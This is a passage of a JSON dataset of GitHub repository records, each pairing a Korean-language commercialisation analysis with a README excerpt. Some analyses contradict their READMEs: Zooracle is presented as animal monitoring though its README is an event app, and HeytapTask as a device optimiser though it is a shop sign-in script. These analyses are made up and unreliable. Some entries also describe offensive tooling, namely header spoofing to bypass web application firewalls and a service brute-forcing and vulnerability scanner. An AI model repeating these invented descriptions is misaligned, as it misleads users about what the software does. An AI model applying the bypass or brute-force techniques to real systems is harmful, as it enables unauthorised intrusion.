guide](https://sunset1995.github.io/dvgo/tutor_forward_facing.html) to capture custom forward-facing scenes and rendering fly-through videos.\n\nBelow are two rgb and depth fly-through videos from custom captured scenes.\n\nhttps://user-images.githubusercontent.com/2712505/174267754-619d4f81-dd04-4c50-ba7f-434774cb890e.mp4\n\n### Features\n- Speedup NeRF by replacing the MLP with the voxel grid.\n- Simple scene representation:\n    - *Volume densities*: dense voxel grid (3D).\n    - *View-dependent colors*: dense feature grid (4D) + shallow MLP.\n- ","composite_score":0.5044,"license_safety_tag":"unknown"},{"name":"cocoa-mhlw/cocoa","github_url":"https://github.com/cocoa-mhlw/cocoa","stars":11,"language":"C#","license":"MPL-2.0","abandonment_months":43,"description":"# COCOA 저장소 분석\n\n## 왜 보물인가\n일본의 공식 코로나19 접촉 추적 앱으로, 감염병 대응 시스템의 실제 구현 사례를 담고 있어 공공보건 디지털 전환의 모범 사례입니다.\n\n## 어디에 쓸 수 있나\n1. **보건당국 SaaS**: 질병관리청이나 지자체가 자체 접촉 추적 플랫폼을 구축할 때 참고하는 오픈소스 기반\n2. **감염병 위기 대응 도구**:","readme_excerpt":"# COCOA - COVID-19 Contact-Confirming Application (English)/([Japanese](README.ja.md))\n\n[![App develop](https://github.com/cocoa-mhlw/cocoa/actions/workflows/CI.yml/badge.svg?branch=develop)](https://github.com/cocoa-mhlw/cocoa/actions/workflows/CI.yml)\n\n[![Server develop](https://github.com/cocoa-mhlw/cocoa/actions/workflows/CIserver.yml/badge.svg?branch=develop)](https://github.com/cocoa-mhlw/cocoa/actions/workflows/CIserver.yml)\n\n[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=cocoa-mhlw_cocoa&metric=alert_status)](https://sonarcloud.io/summary/new_code?id=cocoa-mhlw_cocoa)\n\nThis is the official repository for the COCOA - COVID-19 Contact-Confirming Application.\nCOCOA has been developed from [Project Covid19Radar](https://github.com/Covid-19Radar).\n\nFor information please see the [website](https://cocoa-mhlw.github.io/cocoa).\n\nFor more information on how to install COCOA, instructions, and updates, please visit the MHLW [COCOA website](https://www.mh","composite_score":0.5044,"license_safety_tag":"unknown"},{"name":"hwkxk/HeytapTask","github_url":"https://github.com/hwkxk/HeytapTask","stars":6,"language":"Python","license":"MIT","abandonment_months":55,"description":"# HeytapTask 기술 분석\n\n## 왜 보물인가\nHeytap 기기들의 작업을 자동으로 관리하고 최적화하는 도구로, 중국 내 대규모 사용자 기반을 가진 OppoColorOS 생태계에서 큰 수요가 있을 것으로 예상됩니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: Heytap 사용자를 위한 월 구독형 작업 자동화 플랫폼으로 운영\n2. **내","readme_excerpt":"# HeytapTask\n欢太商城自动签到脚本\n\n\n## 已实现功能\n\n* [x] <s>每日签到</s> 2021-11-27 已被加图形验证码，暂无能力解决\n* [x] 每日浏览商品任务\n* [x] 每日分享商品任务\n* [x] <s>每日点推送任务</s> 2021-9-16 下线\n* [x] 可选 钉钉通知、Tg通知、pushplus推送加、企业微信、Bark通知、IFTTT通知 功能\n\n[![W8j59K.jpg](https://z3.ax1x.com/2021/07/19/W8j59K.jpg)](https://imgtu.com/i/W8j59K)\n\n## 使用方式\n### 本地执行\n> 本项目使用 python3 实现 (3.6以上版本)\n#### 1、下载本项目 左上 CODE - Download ZIP 或 [点此下载](https://github.com/hwkxk/HeytapTask/archive/refs/heads/main.zip)\n#### 2、解压后用文本编辑器 打开`config.ini`按注释说明进行填写\n#### 3、需要安装的依赖\n```\npip install requests \n```\n#### 4、执行方法 命令行or终端 转到程序源码目录下 执行\n```bash\n python main.py\n```\n\n#### 注意：不要fork后将个人信息填写到自己仓库`config.ini`文件中，请下载到本地编辑，以免隐私泄露。\n#### cookies 和 User-Agent 信息请自行在手机登录 `欢太商城` APP后使用HttpCanary等抓包工具获取！\n#### 请一定填好与登录cookie一致的机型信息的UA，不要用默认配置里面的UA，如果登录的UA不同cookie会被失效！\n\n> 具体抓包方法：[欢太商城HttpCanary抓包教程](https://github.com/hwkxk/HeytapTask/wiki/%E6%AC%A2%E5%A4%AA%E5%95%86%E5%9F%8EHttpCanary%E6%8A%93%E5%8C%85%E6%95%99%E7%A8%8B)\n\n\n## 通知推送方式\n\n### 1.钉钉机器人\n\n钉钉群组自定义机器人，但是稳定性高，使用方式参考如下：[钉钉自定义","composite_score":0.5043,"license_safety_tag":"safe"},{"name":"codewatchorg/bypasswaf","github_url":"https://github.com/codewatchorg/bypasswaf","stars":6,"language":"Java","license":"unknown","abandonment_months":101,"description":"# codewatchorg/bypasswaf 분석 리포트\n\n## 왜 보물인가\n웹사이트 보안 시스템을 우회하는 기술을 다루는 저장소로, 보안 연구자와 기업의 취약점 진단에 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 진단 SaaS**: 기업 웹사이트의 보안 강도를 테스트하는 자동화 도구로 월 구독 서비스 운영\n2. **사이버보안 교육 플랫폼","readme_excerpt":"bypasswaf\n=========\n\nAdd headers to all Burp requests to bypass some WAF products.  This extension will automatically add the following headers to all requests.\n\n<pre>\n  X-Originating-IP: 127.0.0.1\n  X-Forwarded-For: 127.0.0.1\n  X-Remote-IP: 127.0.0.1\n  X-Remote-Addr: 127.0.0.1\n  X-Client-IP: 127.0.0.1\n</pre>\n\n\nUsage\n=====\n\nSteps include:\n<ol>\n<li>Add extension to burp</li>\n<li>Create a session handling rule in Burp that invokes this extension</li>\n<li>Modify the scope to include applicable tools and URLs</li>\n<li>Configure the bypass options on the \"Bypass WAF\" tab</li>\n<li>Test away</li>\n</ol>\n\nMore information can be found at: <a href=\"https://www.codewatch.org/blog/?p=408\" target=_codewatch>https://www.codewatch.org/blog/?p=408</a>\n\n\nFeatures\n========\n\nAll of the features are based on Jason Haddix's work found <a href=\"http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366#.VGlMR-90wsd\" target=_hp>here</a>, and ","composite_score":0.5043,"license_safety_tag":"unknown"},{"name":"mgechev/ngrev","github_url":"https://github.com/mgechev/ngrev","stars":6,"language":"TypeScript","license":"mit","abandonment_months":41,"description":"# ngrev 프로젝트 분석\n\n## 왜 보물인가\nAngular 웹 애플리케이션의 복잡한 구조를 시각적으로 분석하고 관계도를 자동으로 그려주는 개발자 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대규모 Angular 프로젝트를 관리하는 개발팀을 위한 클라우드 기반 코드 분석 플랫폼\n2. **내부 업무 도구**: 엔터프라이즈 기업의 I","readme_excerpt":"# ngrev\n\n<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/mgechev/ngrev/master/src/assets/icons/favicon.512x512.png\" alt=\"ngrev\" width=\"250\">\n</p>\n\nGraphical tool for reverse engineering of Angular projects. It allows you to navigate in the structure of your application and observe the relationship between the different modules, providers, and directives. The tool performs **static code analysis** which means that you **don't have to run your application** in order to use it.\n\n**ngrev is not maintained by the Angular team. It's a side project developed by the open source community**.\n\n## How to use?\n\n### macOS\n\n1.  Go to the [releases page](https://github.com/mgechev/ngrev/releases).\n2.  Download the latest `*.dmg` file.\n3.  Install the application.\n\nThe application is not signed, so you may have to explicitly allow your mac to run it in `System Preferences -> Security & Privacy -> General`.\n\n### Linux\n\n1.  Go to the [releases page](https://github.com/mgechev/ngrev/rele","composite_score":0.5043,"license_safety_tag":"safe"},{"name":"Amin-Tgz/awesome-tensorflow-2","github_url":"https://github.com/Amin-Tgz/awesome-tensorflow-2","stars":11,"language":"","license":"CC0-1.0","abandonment_months":42,"description":"","readme_excerpt":"# Awesome Tensorflow 2 💛 [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)\nA curated list of awesome Tensorflow v2 tutorials, blogs, and projects.\n\n![alt text](imgs/logo-color-tensorflow.png)\n\n# 👉 Contents <a name=\"TOC\" />👈\n\n<!-- MarkdownTOC depth=4 -->\n* [What are the advantages of TensorFlow v2 ?](#firstSection)\n* [Official Site](#official)\n* [Tutorials](#GitHub-tutorials)\n* [SampleCodes/Projects](#sample)\n    * [General](#GeneralCode)\n    * [Specific Model/Task (like GAN,RL,NLP,...)](#SpecificCode)\n        * [Reinforcement Learning](#RL)\n        * [GAN](#GAN_Code)\n        * [NLP](#NLP_Code)\n        * [Object Detection](#OD)\n        * [Other](#Other_Code)\n* [Videos](#videos)\n    * [TensorFlow World 2019](#TFW19)\n    * [DevSummit 2019](#DevSum)\n    * [Google I/O 2019](#GIO)\n    * [TensorFlow YouTube Channel](#TYC)\n    * [Course](#course)\n    * [Other](#Other_Video)\n* [Blog posts](#blogs)\n* [Other](#other)\n   * [Python wheels](#whls)\n   * [Tools](#tools)\n   * [#PoweredByTF","composite_score":0.5043,"license_safety_tag":"unknown"},{"name":"codekitchen/dinghy","github_url":"https://github.com/codekitchen/dinghy","stars":5,"language":"Ruby","license":"mit","abandonment_months":87,"description":"# codekitchen/dinghy 분석 보고서\n\n## 왜 보물인가\n개발자들이 복잡한 작업을 자동화하고 효율적으로 관리할 수 있는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소프트웨어 개발 팀을 위한 클라우드 기반 자동화 플랫폼으로 운영\n2. **내부 업무 도구**: 대규모 IT 기업의 개발 부서에서 반복 작업 자동화","readme_excerpt":"# dinghy\n\nDocker on OS X with batteries included, aimed at making a more pleasant local development experience.\nRuns on top of [docker-machine](https://github.com/docker/machine).\n\n  * Faster volume sharing using NFS rather than built-in virtualbox/vmware file shares. A medium-sized Rails app boots in 5 seconds, rather than 30 seconds using vmware file sharing, or 90 seconds using virtualbox file sharing.\n  * Filesystem events work on mounted volumes. Edit files on your host, and see guard/webpack/etc pick up the changes immediately.\n  * Easy access to running containers using built-in DNS and HTTP proxy.\n\nDinghy creates its own VM using `docker-machine`, it will not modify your existing `docker-machine` VMs.\n\nDinghy runs as a wrapper around `docker-machine`, shelling out to create the VM\nand using daemons to start the various services such as NFS and DNS.\n\n## PROJECT STATUS\n\n**TL;DR** I am still actively maintaining Dinghy, making small improvements and fixing issues. But it's unlikel","composite_score":0.5043,"license_safety_tag":"safe"},{"name":"raiden-network/microraiden","github_url":"https://github.com/raiden-network/microraiden","stars":19,"language":"JavaScript","license":"MIT","abandonment_months":94,"description":"# Raiden Network Microraiden 분석\n\n## 왜 보물인가\n작은 금액의 온라인 결제를 매우 빠르고 저렴하게 처리할 수 있는 기술로, 기존 결제 시스템의 느린 속도와 높은 수수료 문제를 해결합니다.\n\n## 어디에 쓸 수 있나\n1. **콘텐츠 마이크로페이 서비스**: 신문 기사, 동영상, 음악을 한 건당 수백 원 수준으로 개별 판매하는 플랫폼","readme_excerpt":"# µRaiden [![Build Status](https://api.travis-ci.org/raiden-network/microraiden.svg)](https://travis-ci.org/raiden-network/microraiden)\n\n[![Join the chat at https://gitter.im/raiden-network/microraiden](https://badges.gitter.im/raiden-network/microraiden.svg)](https://gitter.im/raiden-network/microraiden?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n\nµRaiden is an off-chain, cheap, scalable and low-latency micropayment solution.\n\n[µRaiden documentation](https://microraiden.readthedocs.io/)\n\n\n## Smart Contract\n\nCurrent version: `0.2.0` (second Bug Bounty release). Verifiable with `RaidenMicroTransferChannels.call().version()`.\nNote that a new µRaiden release might include changing the Ethereum address used for the smart contract, in case we need to deploy an improved contract version.\n\nThe `RaidenMicroTransferChannels` contract has been deployed on the main net: [0x1440317CB15499083dEE3dDf49C2bD51D0d92e33](https://etherscan.io/address/0x1440317CB15499083dEE","composite_score":0.5043,"license_safety_tag":"safe"},{"name":"asanakoy/kaggle_carvana_segmentation","github_url":"https://github.com/asanakoy/kaggle_carvana_segmentation","stars":8,"language":"Python","license":"MIT","abandonment_months":43,"description":"# Kaggle Carvana Segmentation 상용화 분석\n\n## 왜 보물인가\n자동차 사진에서 차량만 자동으로 인식하여 배경을 제거하는 기술로, 중고차 판매·렌탈 플랫폼들이 수작업으로 하던 이미지 편집을 완전 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 중고차 거래 플랫폼 SaaS**\n- 판매자가 차량 사진을 올리면 자동으로 배경을 ","readme_excerpt":"# Kaggle Carvana Image Masking Challenge\n![carvana header image](carvana_header.jpg \"Carvana\")\n\nCode for the 1st place solution in [Carvana Image Masking Challenge on car segmentaion](https://www.kaggle.com/c/carvana-image-masking-challenge/leaderboard).\n\nWe used CNNs to segment a car in the image.\nTo achieve best results we use an ensemble of several differnet networks (Linknet, Unet-like CNN with custom encoder, several types of Unet-like CNNs with VGG11 encoder).\n\nOur team:\n- Artsiom Sanakoyeu ([linkedin](https://www.linkedin.com/in/sanakoev/))\n- Alexander Buslaev ([linkedin](https://www.linkedin.com/in/al-buslaev/))\n- Vladimir Iglovikov ([linkedin](https://www.linkedin.com/in/iglovikov/))\n\nBlogpost explaining the solution: https://medium.com/kaggle-blog/carvana-image-masking-challenge-1st-place-winners-interview-78fcc5c887a8\n\n# Requirements\nTo train final models you will need the following:\n\n- OS: Ubuntu 16.04 \n- Required hardware: \n    - Any decent modern computer with x86-64 CPU,","composite_score":0.5043,"license_safety_tag":"safe"},{"name":"Liqunkit/LiqunKit_","github_url":"https://github.com/Liqunkit/LiqunKit_","stars":60,"language":"","license":"unknown","abandonment_months":53,"description":"# LiqunKit 사업화 분석\n\n## 왜 보물인가\n[정보 부족] 저장소 설명이 없어 핵심 기능을 파악하기 어렵지만, 60개의 스타를 받은 것으로 보아 특정 개발자 커뮤니티에서 유용성을 인정받은 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 기업 개발팀이 반복적인 작업을 자동화하는 솔루션으로 판매\n2. **API 서비스**: 다른 소","readme_excerpt":"\n# 遵守规章制度关闭项目\n\n仅限于内部测试使用，请勿用于未授权的攻击！！ \n\n该程序及用于安全人员本地测试使用！！\n\n用户滥用造成的一切后果与作者无关！！ \n\n使用者请务必遵守当地法律！！ \n\n本程序不得用于商业用途，仅限学习交流！！\n\n--------------------------------------------------------------------------------------------------------------------------------------------------------------------\n","composite_score":0.5043,"license_safety_tag":"unknown"},{"name":"ChrisKnott/Algojammer","github_url":"https://github.com/ChrisKnott/Algojammer","stars":5,"language":"C++","license":"Apache-2.0","abandonment_months":84,"description":"# ChrisKnott/Algojammer 분석\n\n## 왜 보물인가\n복잡한 알고리즘을 실행 과정을 단계별로 눈으로 직접 보며 배울 수 있는 시각화 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **교육용 SaaS**: 프로그래밍 입문자를 위한 온라인 강의 플랫폼의 핵심 기능으로 판매\n2. **기업 내부 도구**: 대규모 IT 회사의 신입 사원 교육 및 알고리","readme_excerpt":"# Algojammer\n\n**Algojammer** is an experimental, proof-of-concept code editor for writing algorithms in Python. It was mainly written to assist with solving the kind of algorithm problems that feature in competitions like [Google Code Jam](https://code.google.com/codejam/), [Topcoder](https://tco18.topcoder.com/algorithm/) and [HackerRank](https://www.hackerrank.com/domains/algorithms).\n\n![Editor](https://github.com/ChrisKnott/Algojammer/raw/master/README/Algojammer.gif)  \n<sup>Writing code for a Bubble Sort algorithm (sorting array of 10 numbers, then changing code to 100 numbers)</sup>\n\nAlgojammer is heavily inspired by <sub><sup>(stolen from)</sup></sub> the work of [Bret Victor](http://worrydream.com/), particularly [Learnable Programming](http://worrydream.com/LearnableProgramming/) (2012) and [Inventing On Principle](https://vimeo.com/36579366) (2012), although it only incorporates some of the ideas presented. A longer list of other influences and similar projects is given in [In","composite_score":0.5043,"license_safety_tag":"safe"},{"name":"fossasia/zooracle","github_url":"https://github.com/fossasia/zooracle","stars":12,"language":"TypeScript","license":"Apache-2.0","abandonment_months":27,"description":"# Zooracle 사업화 분석\n\n## 왜 보물인가\n동물원이나 야생동물 보호 기관이 동물의 건강과 행동을 자동으로 모니터링할 수 있는 똑똑한 시스템입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 동물원·수족관·보호센터가 월 구독으로 이용하는 동물 모니터링 플랫폼\n2. **내부 업무 도구**: 대형 동물원 체인이 여러 시설의 동물 건강 데이","readme_excerpt":"# FOSSASIA Open-Event-Next\n\nThis is a [Next.js](https://nextjs.org/) project bootstrapped with [`create-next-app`](https://github.com/vercel/next.js/tree/canary/packages/create-next-app).\n\nCheckout the deployed App : [Open-Event-Next](http://open-event-next-git-master-eventyay.vercel.app/).\n\n## Getting Started!\n\n## Steps\n\n- `git clone <repository-url>` this repository\n- `cd open-event-next`\n\n## Install dependencies\n\n```\nyarn\n```\n\n## Run the development server:\n\n```bash\nyarn dev\n```\n\nOpen [http://localhost:3000](http://localhost:3000) with your browser to see the result.\n\nYou can start editing the page by modifying `pages/index.js`. The page auto-updates as you edit the file.\n\n[API routes](https://nextjs.org/docs/api-routes/introduction) can be accessed on [http://localhost:3000/api/hello](http://localhost:3000/api/hello). This endpoint can be edited in `pages/api/hello.js`.\n\nThe `pages/api` directory is mapped to `/api/*`. Files in this directory are treated as [API routes](https://nex","composite_score":0.5042,"license_safety_tag":"safe"},{"name":"mrthefakeperson/Excel-Virtual-Machine","github_url":"https://github.com/mrthefakeperson/Excel-Virtual-Machine","stars":192,"language":"F#","license":"unknown","abandonment_months":71,"description":"# Excel-Virtual-Machine 분석 보고서\n\n## 왜 보물인가\n엑셀 파일을 마치 작은 컴퓨터처럼 실행할 수 있어서, 별도의 복잡한 프로그램 설치 없이 엑셀만으로 자동화 작업을 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 엑셀 자동화 클라우드 플랫폼**\n- 중소기업 회계 담당자들이 웹 브라우저에서 엑셀 파일을 업로","readme_excerpt":"# Purpose\n\nThis project aims to accurately compile common programming languages and I/O features into Microsoft Excel (2015) files.\n\n# How to Use\n\nThis project is currently incomplete.\n\nFrom the latest release version: use the command `Excel_VM myFile.file -outputExcelFile` (or `Excel_VM myFile.file` to get a Windows compatible executable file), replacing `myFile.file` with the name of your file.\n\nThe compiled Excel file can be executed by triggering iterative calculation (pressing F9 repeatedly) in Microsoft Excel. The project currently supports C and F# (incomplete). I/O operations are supported with cell A2 acting as standard input, and cell B2 acting as standard output.\n\n### Note\n\nBy default, 500 iterations are made each time. To ensure accuracy, do not disturb the spreadsheet before it is finished recalculating.\n\n# Links\n\nblog post: https://mrthefakeperson.github.io/Excel-Virtual-Machine\n\nlatest version: [download](https://mrthefakeperson.github.io/Excel-Virtual-Machine/Excel_VM.z","composite_score":0.5042,"license_safety_tag":"unknown"},{"name":"HyperCubeMC/Iris","github_url":"https://github.com/HyperCubeMC/Iris","stars":6,"language":"Java","license":"LGPL-3.0","abandonment_months":53,"description":"# HyperCubeMC/Iris 분석\n\n## 왜 보물인가\n마인크래프트 게임 서버를 더 쉽고 빠르게 만들 수 있는 도구로, 게임 개발자들의 작업 시간을 크게 줄여줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 마인크래프트 서버 자동 생성 플랫폼으로 초보자도 클릭 몇 번으로 서버를 구축하게 하는 클라우드 서비스\n2. **내부 업무 ","readme_excerpt":"![Iris: An open-source shaders mod compatible with OptiFine shaderpacks](docs/banner.png)\n\n# Iris Starline (Archived)\n\nThis fork is no longer needed, because Iris 1.2.0+ includes support for shader settings / config. Get it at https://irisshaders.net!\n\nWhen the Starline fork was first created, Iris was an alpha-quality mod with few features. To get more features, it was common to merge together the experimental open PRs, to get things like more shader support or shader settings. Starline first emerged as a fork that merged all of these PRs together, packaged in a way that many people could easily use them without needing to merge things themselves. As Iris developed further, this became less and less necessary, until only shader settings remained as the sole unmerged feature.\n\nAs it turned out, a release-ready implementation of a functional shader config GUI was a ton of work, especially since upstream Iris chose to rewrite the shader config code instead of using the config code in Sta","composite_score":0.5042,"license_safety_tag":"restricted"},{"name":"muhammederdem/vue-interactive-paycard","github_url":"https://github.com/muhammederdem/vue-interactive-paycard","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":41,"description":"# Vue Interactive Paycard 분석\n\n## 왜 보물인가\n신용카드 결제 화면을 마치 실제 카드를 만지는 것처럼 부드럽게 표현할 수 있어서, 온라인 쇼핑이나 결제 서비스를 더 신뢰감 있고 재미있게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **전자상거래 플랫폼**: 온라인 쇼핑몰의 결제 페이지를 사용자 친화적으로 개선하여 결제 완료율 증","readme_excerpt":"# vue-interactive-paycard (npm package (for react & react-native too) is coming soon)\n\nA fantastic credit card form with smooth and sweet micro-interactions. Includes number formatting, validation and automatic card type detection. Built with vuejs and also fully responsive.\n\nSee Live: https://codepen.io/JavaScriptJunkie/pen/YzzNGeR\n\n![](demo.gif)\n\n\n## Project setup\n```\nnpm install\n```\n\n### Compiles and hot-reloads for development\n```\nnpm run serve\n```\n\n### Compiles and minifies for production\n```\nnpm run build\n```\n\n### Run your unit tests\n```\nnpm run test:unit\n```\n\n### Lints and fixes files\n```\nnpm run lint\n```\n\n### Customize configuration\nSee [Configuration Reference](https://cli.vuejs.org/config/).\n","composite_score":0.5042,"license_safety_tag":"safe"},{"name":"salvadordeveloper/flutter-crypto-app","github_url":"https://github.com/salvadordeveloper/flutter-crypto-app","stars":8,"language":"Dart","license":"MIT","abandonment_months":44,"description":"# Flutter 암호화폐 앱 분석\n\n## 왜 보물인가\n스마트폰에서 바로 사용할 수 있는 암호화폐 관리 앱의 기초 구조가 완성되어 있어, 추가 기능만으로 즉시 사업화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 투자 앱 SaaS**: 월 구독료를 받고 사용자들에게 비트코인·이더리움 시세 조회 및 포트폴리오 관리 기능 제공\n2. **금융사 내","readme_excerpt":"\n# Flutter Crypto APP\nComplete Flutter Application with Riverpod & Freezed + Dio for API REST.\n\n[![test](https://github.com/salvadordeveloper/flutter-crypto-app/actions/workflows/tests.yml/badge.svg)](https://github.com/salvadordeveloper/flutter-crypto-app/actions/workflows/tests.yml)\n[![build](https://github.com/salvadordeveloper/flutter-crypto-app/actions/workflows/release.yml/badge.svg)](https://github.com/salvadordeveloper/flutter-crypto-app/actions/workflows/release.yml)\n[![codecov](https://codecov.io/gh/salvadordeveloper/flutter-crypto-app/branch/main/graph/badge.svg?token=UYU0OB442S)](https://codecov.io/gh/salvadordeveloper/flutter-crypto-app)\n[![Flutter version](https://img.shields.io/badge/flutter-2.10.2-blue?logo=flutter)](https://flutter.dev/docs/get-started/install)\n[![GitHub license](https://img.shields.io/github/license/chinnonsantos/full_testing_flutter)](https://choosealicense.com/licenses/mit/)\n\n<img src=\"screenshots/cover.png\" >\n\n## Features\n- API REST (CryptoWatch)\n-","composite_score":0.5042,"license_safety_tag":"safe"},{"name":"zyylhn/zscan","github_url":"https://github.com/zyylhn/zscan","stars":60,"language":"Go","license":"MIT","abandonment_months":30,"description":"# zscan 저장소 분석\n\n## 왜 보물인가\n웹사이트의 보안 취약점을 자동으로 찾아주는 스캔 도구로, 기업의 사이버 보안 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업을 위한 월 구독형 웹사이트 보안 점검 서비스로 클라우드 플랫폼 제공\n2. **내부 업무 도구**: 대기업 IT팀이 자사 웹서버의 보안 결","readme_excerpt":"#              Zscan a scan blasting tool set\n[![Licens](https://img.shields.io/badge/Licens-MIT-orange)](https://github.com/zyylhn/zscan/blob/master/LICENSE)\n[![Releases](https://img.shields.io/badge/Releases-v1.4.3-brightgreen)](https://github.com/zyylhn/zscan/releases/tag/1.4.3)\n[![go](https://img.shields.io/badge/Go-1.16.3-blue)](https://github.com/zyylhn/zscan)\n\n📄[English document](https://github.com/zyylhn/zscan/blob/master/README_EN.md)\n\n更新内容见日志[log](https://github.com/zyylhn/zscan/blob/master/update.log)\n\n<details>\n<summary><b>结果输出格式</b></summary>\n-输出的部分结果截图，分两个阶段，第一阶段是扫描过程中的输出，从主机存活探测结束开始，第二个阶段是将所有扫描的结果做整理，从输出port result list开始\n\n<img src=\"image/result.jpg\" style=\"zoom:50%;\" />\n\n\n<img src=\"image/ps_02.jpg\" style=\"zoom:50%;\" />\n\n\n</details>\n\n\n## 简介🎉\n\n\n​\tZscan是一个开源的内网端口扫描器、爆破工具和其他实用工具的集合体可以称为工具包。以内网网段发现、主机发现和端口扫描为基础，可以在blast模块中对mysql、mssql、redis、mongo、postgres、ftp、ssh、ldap、rdp、smb等服务进行爆破，在scan模块中进行netbios、smb、oxid、socks server（扫描代理服务器）、ms17010、http的poc扫描等扫描功能，默认会抓取http的title和指纹信息","composite_score":0.5042,"license_safety_tag":"safe"},{"name":"nlsandler/write_a_c_compiler","github_url":"https://github.com/nlsandler/write_a_c_compiler","stars":13,"language":"C","license":"MIT","abandonment_months":32,"description":"# nlsandler/write_a_c_compiler 분석\n\n## 왜 보물인가\n프로그래밍 언어를 만드는 방법을 단계별로 배울 수 있는 교육 자료로, 컴퓨터 과학의 핵심 원리를 이해하고 싶은 개발자들에게 매우 실용적입니다.\n\n## 어디에 쓸 수 있나\n- **교육용 SaaS**: 프로그래밍 학습 플랫폼에서 \"언어 만들기\" 강의 모듈로 제공\n- **기업 교육 ","readme_excerpt":"# Write a C Compiler!\n\n**This repo is no longer active. The latest version of this test suite, which accompanies the [Writing a C Compiler book](https://nostarch.com/writing-c-compiler), is available [here](https://github.com/nlsandler/writing-a-c-compiler-tests/).**\n\nThis is a set of C test programs to help you write your own compiler. They were written to accompany [this tutorial](https://norasandler.com/2017/11/29/Write-a-Compiler.html).\n\n## Usage\n\n### test all\n```\n./test_compiler.sh /path/to/your/compiler\n```\n\n### test specific stages\nTo test stage 1 and stage 3,\n```\n./test_compiler.sh /path/to/your/compiler 1 3\n```\nTo test from stage 1 to stage 6,\n```\n./test_compiler.sh /path/to/your/compiler `seq 1 6`\n```\n\nIn order to use this script, your compiler needs to follow this spec:\n\n1. It can be invoked from the command line, taking only a C source file as an argument, e.g.: `./YOUR_COMPILER /path/to/program.c`\n\n2. When passed `program.c`, it generates executable `program` in the same d","composite_score":0.5042,"license_safety_tag":"safe"},{"name":"WeChat-Big-Data-Challenge-2021/WeChat_Big_Data_Challenge","github_url":"https://github.com/WeChat-Big-Data-Challenge-2021/WeChat_Big_Data_Challenge","stars":7,"language":"Python","license":"unknown","abandonment_months":61,"description":"# WeChat Big Data Challenge 2021 분석\n\n## 왜 보물인가\n위챗의 대규모 사용자 데이터를 활용한 추천 및 분석 기술로, 중국 시장의 소비자 행동 패턴을 이해하고 예측할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중국 진출 기업을 위한 \"위챗 사용자 분석 대시보드\" 월 구독 서비스\n- **내부 업무 도구**","readme_excerpt":"# **2021中国高校计算机大赛-微信大数据挑战赛Baseline**\n\n本次比赛基于脱敏和采样后的数据信息，对于给定的一定数量到访过微信视频号“热门推荐”的用户，根据这些用户在视频号内的历史n天的行为数据，通过算法在测试集上预测出这些用户对于不同视频内容的互动行为（包括点赞、点击头像、收藏、转发等）的发生概率。 \n\n本次比赛以多个行为预测结果的加权uAUC值进行评分。大赛官方网站：https://algo.weixin.qq.com/\n\n## **1. 环境配置**\n\n- pandas>=1.0.5\n- tensorflow>=1.14.0\n- python3\n\n## **2. 运行配置**\n\n- CPU/GPU均可\n- 最小内存要求\n    - 特征/样本生成：3G\n    - 模型训练及评估：6G\n\n- 耗时\n    - 测试环境：内存8G，CPU 2.3 GHz 双核Intel Core i5\n    - 特征/样本生成：226 s\n    - 模型训练及评估：740 s \n    \n## **3. 目录结构**\n\n- comm.py: 数据集生成\n- baseline.py: 模型训练，评估，提交\n- evaluation.py: uauc 评估\n- data/: 数据，特征，模型\n    - wechat_algo_data1/: 初赛数据集\n    - feature/: 特征\n    - offline_train/：离线训练数据集\n    - online_train/：在线训练数据集\n    - evaluate/：评估数据集\n    - submit/：在线预估结果提交\n    - model/: 模型文件\n\n## **4. 运行流程**\n- 新建data目录，下载比赛数据集，放在data目录下并解压，得到wechat_algo_data1目录\n- 生成特征/样本：python comm.py （自动新建data目录下用于存储特征、样本和模型的各个目录）\n- 训练离线模型：python baseline.py offline_train \n- 评估离线模型：python baseline.py evaluate  （生成data/evaluate/submit_${timestamp}.csv）\n- 训练在线模型：python baselin","composite_score":0.5041,"license_safety_tag":"unknown"},{"name":"ReactPrimer/ReactPrimer","github_url":"https://github.com/ReactPrimer/ReactPrimer","stars":137,"language":"JavaScript","license":"MIT","abandonment_months":100,"description":"# ReactPrimer 분석 보고서\n\n## 왜 보물인가\nReact라는 인기 있는 웹 개발 도구를 배우기 쉽게 만든 학습 자료로, 입문자들이 실제 웹 서비스를 만들 수 있게 도와주는 교육 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼(SaaS)**: 웹 개발 강의 구독 서비스에 ReactPrimer 커리큘럼을 통합하여 월 구독료 수익화","readme_excerpt":"\n# ReactPrimer &middot; <img src=\"https://travis-ci.org/ReactPrimer/ReactPrimer.svg?branch=master\">   [![GitHub license](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/ReactPrimer/ReactPrimer/blob/master/LICENSE.md) [![GitHub release](https://img.shields.io/github/release/qubyte/rubidium.svg)](https://github.com/ReactPrimer/ReactPrimer/releases/tag/1.0.0)\n\n<p align=\"center\"><img src=\"/assets/icons/png/128x128.png\"></p>\n\n<p align=\"center\">React Primer is a component prototyping tool that generates fully connected class component code.</p>\n<p align=\"center\">\n<img src=\"/assets/demo/demo_15mb.gif\"/>\n</p>\n\n## Setup\n\n###### MacOS\n\n1. [Download](https://github.com/ReactPrimer/ReactPrimer/releases/download/1.0.0/ReactPrimer.dmg) the latest release .dmg file.\n2. Open the installer.\n3. Move 